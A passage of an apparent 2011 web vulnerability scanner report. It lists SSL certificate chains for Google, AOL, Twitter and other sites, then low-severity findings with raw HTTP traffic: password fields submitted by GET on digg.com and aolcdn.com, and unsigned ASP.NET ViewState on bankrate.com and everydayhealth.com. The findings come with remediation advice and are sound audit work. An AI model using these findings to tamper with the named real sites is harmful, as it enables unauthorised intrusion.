Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	adwords.google.com
Issued by:	Google Internet Authority
Valid from:	Wed Apr 13 04:20:26 CDT 2011
Valid to:	Fri Apr 13 04:30:26 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

12.5. https://aolproductcentral.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://aolproductcentral.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	aolproductcentral.aol.com
Issued by:	AOL Member CA
Valid from:	Wed Mar 02 10:30:26 CST 2011
Valid to:	Fri Mar 01 10:30:26 CST 2013

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.6. https://api.screenname.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://api.screenname.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	api.screenname.aol.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Mon Aug 30 19:00:00 CDT 2010
Valid to:	Wed Sep 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.7. https://at.atwola.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://at.atwola.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	at.atwola.com
Issued by:	AOL Member CA
Valid from:	Tue Sep 07 10:36:15 CDT 2010
Valid to:	Thu Sep 06 10:36:15 CDT 2012

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.8. https://bill.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bill.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	bill.aol.com
Issued by:	AOL Member CA
Valid from:	Wed May 12 07:43:14 CDT 2010
Valid to:	Fri May 11 07:43:14 CDT 2012

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.9. https://chrome.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chrome.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Wed Apr 13 04:16:45 CDT 2011
Valid to:	Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

12.10. https://maps-api-ssl.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Wed Apr 13 04:16:45 CDT 2011
Valid to:	Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

12.11. https://my.screenname.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.screenname.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	my.screenname.aol.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Tue Feb 02 18:00:00 CST 2010
Valid to:	Mon Mar 05 17:59:59 CST 2012

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.12. https://new.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://new.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	new.aol.com
Issued by:	AOL Member CA
Valid from:	Wed Dec 22 22:41:25 CST 2010
Valid to:	Fri Dec 21 22:41:25 CST 2012

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.13. https://rsp.web.aol.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://rsp.web.aol.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	rsp.web.aol.com
Issued by:	AOL Member CA
Valid from:	Tue Jul 14 09:53:14 CDT 2009
Valid to:	Thu Jul 14 09:53:14 CDT 2011

Certificate chain #1

Issued to:	AOL Member CA
Issued by:	America Online Root Certification Authority 1
Valid from:	Fri Jun 04 12:26:39 CDT 2004
Valid to:	Mon Jun 04 12:26:39 CDT 2029

Certificate chain #2

Issued to:	America Online Root Certification Authority 1
Issued by:	America Online Root Certification Authority 1
Valid from:	Tue May 28 01:00:00 CDT 2002
Valid to:	Thu Nov 19 14:43:00 CST 2037

12.14. https://spreadsheets.google.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://spreadsheets.google.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	*.google.com
Issued by:	Google Internet Authority
Valid from:	Wed Apr 13 04:16:45 CDT 2011
Valid to:	Fri Apr 13 04:26:45 CDT 2012

Certificate chain #1

Issued to:	Google Internet Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Mon Jun 08 15:43:27 CDT 2009
Valid to:	Fri Jun 07 14:43:27 CDT 2013

Certificate chain #2

Issued to:	Equifax Secure Certificate Authority
Issued by:	Equifax Secure Certificate Authority
Valid from:	Sat Aug 22 11:41:51 CDT 1998
Valid to:	Wed Aug 22 11:41:51 CDT 2018

12.15. https://twitter.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://twitter.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	twitter.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Mon Jul 26 19:00:00 CDT 2010
Valid to:	Wed Jul 27 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.16. https://us.etrade.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://us.etrade.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	us.etrade.com
Issued by:	VeriSign Class 3 Extended Validation SSL CA
Valid from:	Mon Jul 19 19:00:00 CDT 2010
Valid to:	Wed Jul 20 18:59:59 CDT 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Extended Validation SSL CA
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

12.17. https://www.fightmagazine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.fightmagazine.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.fightmagazine.com
Issued by:	Thawte SSL CA
Valid from:	Mon Apr 04 19:00:00 CDT 2011
Valid to:	Thu May 03 18:59:59 CDT 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

12.18. https://www.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.GoDaddy.com
Issued by:	Go Daddy Secure Certification Authority
Valid from:	Tue Jan 04 10:21:18 CST 2011
Valid to:	Mon Jan 14 16:28:36 CST 2013

Certificate chain #1

Issued to:	Go Daddy Secure Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Wed Nov 15 19:54:37 CST 2006
Valid to:	Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:	Go Daddy Class 2 Certification Authority
Issued by:	Go Daddy Class 2 Certification Authority
Valid from:	Tue Jun 29 12:06:20 CDT 2004
Valid to:	Thu Jun 29 12:06:20 CDT 2034

12.19. https://www.neodata.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neodata.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.neodata.com
Issued by:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:	Mon Aug 17 19:00:00 CDT 2009
Valid to:	Sun Sep 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Wed Apr 16 19:00:00 CDT 1997
Valid to:	Mon Oct 24 18:59:59 CDT 2016

Certificate chain #2

Issued to:	Class 3 Public Primary Certification Authority
Issued by:	Class 3 Public Primary Certification Authority
Valid from:	Sun Jan 28 18:00:00 CST 1996
Valid to:	Wed Aug 02 18:59:59 CDT 2028

13. Password field submitted using GET method previous next
There are 2 instances of this issue:

http://digg.com/submit
http://o.aolcdn.com/art/merge/

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

13.1. http://digg.com/submit previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://digg.com/submit

The form contains the following password field:

password

Request

GET /submit HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://o.aolcdn.com/art/merge/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://o.aolcdn.com
Path:	/art/merge/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

http://o.aolcdn.com/art/merge/?f=/mobileportal/s2c_modal.js&f=/mobileportal/mobile_s2c_init.js&f=/feedback/feedback1.js&f=/mobileportal/mobileblog_profile.js&xpsec=31536000&ver=1y

The form contains the following password field:

confirmpassword

Request

Response

HTTP/1.1 200 OK
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Fri, 06 May 2011 00:58:27 GMT
Date: Thu, 05 May 2011 00:58:27 GMT
Connection: close
Content-Length: 27714

eval(function ($) {
$.modal = function (data, options) {
return $.modal.impl.init(data, options);
};
$.modal.close = function () {
$.modal.impl.close(true);
};
$.fn
...[SNIP]...
</span><form name="login" onsubmit="profileLogin(); return false;"><label for="confirmpassword">
...[SNIP]...
</label><input type="password" name="confirmpassword" id="pwLogin" /><input id="loginButton" type="submit" onClick="profileLogin();" value="Login">
...[SNIP]...

14. ASP.NET ViewState without MAC enabled previous next
There are 5 instances of this issue:

http://www.bankrate.com/funnel/mortgages/
http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx
http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx
http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx
http://www.everydayhealth.com/sexual-health/sexual-dysfunction/additional-treatments-for-female-sexual-arousal-disorder.aspx

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

14.1. http://www.bankrate.com/funnel/mortgages/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bankrate.com
Path:	/funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQxNTkyMzg4Mg9kFgJmD2QWAgIID2QWBAIWD2QWAgIBD2QWCGYPZBYCZg9kFgQCAQ9kFgJmD2QWBmYPEGQQFTQMU2VsZWN0IFN0YXRlB0FsYWJhbWEGQWxhc2thB0FyaXpvbmEIQXJrYW5zYXMKQ2FsaWZvcm5pYQhDb2xvcmFkbwtDb25uZWN0aWN1dAhEZWxhd2FyZRREaXN0cmljdCBvZiBDb2x1bWJpYQdGbG9yaWRhB0dlb3JnaWEGSGF3YWlpBUlkYWhvCElsbGlub2lzB0luZGlhbmEESW93YQZLYW5zYXMIS2VudHVja3kJTG91aXNpYW5hBU1haW5lCE1hcnlsYW5kDU1hc3NhY2h1c2V0dHMITWljaGlnYW4JTWlubmVzb3RhC01pc3Npc3NpcHBpCE1pc3NvdXJpB01vbnRhbmEITmVicmFza2EGTmV2YWRhDU5ldyBIYW1wc2hpcmUKTmV3IEplcnNleQpOZXcgTWV4aWNvCE5ldyBZb3JrDk5vcnRoIENhcm9saW5hDE5vcnRoIERha290YQRPaGlvCE9rbGFob21hBk9yZWdvbgxQZW5uc3lsdmFuaWEMUmhvZGUgSXNsYW5kDlNvdXRoIENhcm9saW5hDFNvdXRoIERha290YQlUZW5uZXNzZWUFVGV4YXMEVXRhaAdWZXJtb250CFZpcmdpbmlhCldhc2hpbmd0b24NV2VzdCBWaXJnaW5pYQlXaXNjb25zaW4HV3lvbWluZxU0AAJBTAJBSwJBWgJBUgJDQQJDTwJDVAJERQJEQwJGTAJHQQJISQJJRAJJTAJJTgJJQQJLUwJLWQJMQQJNRQJNRAJNQQJNSQJNTgJNUwJNTwJNVAJORQJOVgJOSAJOSgJOTQJOWQJOQwJORAJPSAJPSwJPUgJQQQJSSQJTQwJTRAJUTgJUWAJVVAJWVAJWQQJXQQJXVgJXSQJXWRQrAzRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAg8WAh4Fc3R5bGUFDmRpc3BsYXk6IG5vbmU7ZAIDDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAICD2QWAmYPZBYEZg8PZBYCHgdvbmtleXVwBZABWmlwQ29kZVNlbGVjdG9yLkNoZWNrWmlwQ29kZSh0aGlzLnZhbHVlLCQoJ2N0bDAwX3dlbGxfTW9ydGdhZ2VGdW5uZWxTdGFydF9TdGF0ZUNpdHlaaXBTZWxlY3Rvcl9TdGF0ZUNpdHlaaXBUYWJzX1ppcFRhYl9aaXBDb2RlU2VsZWN0b3JfY3RsMDAnKSk7ZAIBDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAIBDw8WAh4EVGV4dAUGMTY1MDAwZGQCAw8QZGQWAWZkAgQPD2QWAh4Hb25jbGljawVMJCgnYXNwbmV0Rm9ybScpLm9uc3VibWl0PWZ1bmN0aW9uKCl7cmV0dXJuIE1vcnRnYWdlU3RhcnQuVmFsaWRhdGVVcGRhdGUoKTt9O2QCHA9kFgJmD2QWAgIBD2QWAgIBDxYCHwIF2wkNCiA8IS0tIEJsdWVrYWkgUHJvdmlkZXIgVGFncyAtLT4NCiA8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCgkgaWYgKHR5cGVvZihQYWdlTWFuYWdlcikgIT0gInVuZGVmaW5lZCIgICYmIFBhZ2VNYW5hZ2VyIT1udWxsICYmIFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YSE9bnVsbCkNCgkJew0KCQkgdmFyIHBhckxpc3Q9IiI7DQoJCSB2YXIgZXhjTGlzdD0iIjsNCgkJICBpZiAoIVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleSgnQmx1ZUthaVBhcmEnKSkNCgkJCVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5BZGQoJ0JsdWVLYWlQYXJhJywnTG9jYXRpb24sS2V5d29yZHMsQ2F0ZWdvcnknKTsNCg0KCQkgcGFyTGlzdD0gUGFnZU1hbmFnZXIuUGFnZU1ldGFEYXRhLlZhbHVlc1snQmx1ZUthaVBhcmEnXS5zcGxpdCgiLCIpOw0KCQkgZm9yKHZhciBpPTA7IGk8cGFyTGlzdC5sZW5ndGg7IGkrKykNCgkJCXsNCgkJCQkgaWYgKFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleShwYXJMaXN0W2ldKSkNCgkJCQkJCXsNCgkJCQkJCQkgYmtfYWRkUGFnZUN0eChwYXJMaXN0W2ldLFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5WYWx1ZXNbcGFyTGlzdFtpXV0pOw0KCQkJCQkJfQ0KCQkJfSANCgkJCQ0KCQl9DQoJIGlmKCFJc051bGxvclVuZGVmaW5lZChDb29raWVNYW5hZ2VyKSAmJiAhSXNOdWxsb3JVbmRlZmluZWQoQ29va2llTWFuYWdlci5PcGVuKCdicm1iaycpLkdldCgnQktVRCcpKSkgDQoJCXsNCgkJIHZhciB1c2VydmFsPUNvb2tpZU1hbmFnZXIuT3BlbignYnJtYmsnKS5HZXQoJ0JLVUQnKTsNCgkJIGZvcih2YXIgaT0wOyBpPCB1c2VydmFsLnNwbGl0KCcsJykubGVuZ3RoIDsgaSsrKQ0KCQkJCSB7DQoJCQkJICAgaWYodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JykubGVuZ3RoID4gMSAmJiAoSXNOdWxsb3JVbmRlZmluZWQoZXhjTGlzdCkgfHwgZXhjTGlzdC5zcGxpdCgnLCcpLmluZGV4T2YodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JylbMF0pIDwgMCApKQ0KCQkJCQkJCSBia19hZGRVc2VyQ3R4KHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzBdLHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzFdKTsNCgkJCSB9DQoJCQkgQ29va2llTWFuYWdlci5EZWxldGUoJ2JybWJrJyk7DQoJCX0NCgkgYmtfZG9KU1RhZygyMzExLCA0KTsNCgkgPC9zY3JpcHQ+DQo8IS0tIEVuZCBCbHVla2FpIFRhZ3MgLS0+ZGQ=" />
...[SNIP]...

14.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.everydayhealth.com
Path:	/allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105

<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAX7Bg0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJDYW4gQ2xpbWF0ZSBDaGFuZ2UgQ2F1c2UgQWxsZXJneT8gLSBBbGxlcmd5IENlbnRlciAtIEV2ZXJ5ZGF5IEhlYWx0aCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiAgcnVuYXQ9InNlcnZlciIgIGlkPSJmYmRlc2NyaXB0aW9uIiBjb250ZW50PSJHbG9iYWwgd2FybWluZyBjb3VsZCBiZSBhZ2dyYXZhdGluZyB5b3VyIGFsbGVyZ2llcy4gR2V0IGFkdmljZSBvbiBob3cgdG8gZWFzZSBzeW1wdG9tcyBhbmQgY2FyZSBmb3IgYWxsZXJnaWVzIGluIHRvZGF5J3MgZW52aXJvbm1lbnQgYXQgRXZlcnlkYXkgSGVhbHRoLiIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ3kvY2xpbWF0ZS1jaGFuZ2UtYW5kLWFsbGVyZ2llcy5hc3B4IiAvPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29ubmVjdC5mYWNlYm9vay5uZXQvZW5fVVMvYWxsLmpzI3hmYm1sPTEiPjwvc2NyaXB0PmQCAw9kFgICAQ9kFgICAg9kFghmD2QWBGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCAgEPZBYCZg8PFgQeCENzc0NsYXNzBQp2ZXJ0aWNhbGFkHgRfIVNCAgJkZAICD2QWAgIBD2QWBAIBDw8WAh8ABQ5OZXh0IEFydGljbGU6IGRkAgMPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAVaaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoeS1saXZpbmcvMDIyNS9nbG9iYWwtd2FybWluZy1tYXktcG9zZS1kZWF0aC1yaXNrcy5hc3B4ZBYCZg8VASdHbG9iYWwgICBXYXJtaW5nICBNYXkgUG9zZSBIZWFsdGggUmlza3NkAgMPZBYGAgEPZBYEAgEPDxYCHwAFHVJlbGF0ZWQgQXJ0aWNsZXMgb24gQWxsZXJnaWVzZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFWmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGgu